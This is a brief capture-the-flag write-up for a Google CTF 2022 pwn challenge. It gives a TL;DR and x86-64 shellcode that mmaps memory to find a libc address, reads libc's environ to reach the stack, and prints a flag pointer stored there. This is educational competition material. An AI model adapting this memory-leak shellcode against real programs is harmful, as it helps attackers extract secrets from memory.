Tags: misc pwn 

TL;DR

mmap a large chunk to get a libc address.

Read libc's environ to get a stack address.

Use the flag reference on the stack to print out the flag.

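// mmap large chunk to get libc
mov rax, 9          // SYS_mmap
mov rdi, 0          // addr = NULL, let the kernel pick the address
mov rsi, 0x100000   // length
mov rdx, 0x7        // prot = PROT_READ | PROT_WRITE | PROT_EXEC
mov r10, 0x22       // flags = MAP_PRIVATE | MAP_ANONYMOUS
mov r8,  -1         // fd = -1 (anonymous mapping)
mov r9,  0          // offset = 0
syscall             // rax = address of the new mapping

// get stack from libc environ
add rax, 0x2ef600   // offset from the mapping to libc's environ
mov rsp, [rax]      // environ holds a stack address

// print flag
mov rax, 1          // SYS_write
mov rdi, 1          // fd = stdout
mov rdx, 0x100      // length
mov rsi, [rsp-0x240] // flag reference stored on the stack
syscall

Original writeup (https://bronson113.github.io/2022/07/05/segfault-labyrinth-GoogleCTF2022.html).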